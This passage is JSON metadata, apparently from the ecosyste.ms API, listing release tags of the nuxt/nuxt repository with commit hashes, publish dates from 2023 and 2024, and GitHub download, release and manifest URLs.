ries/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url"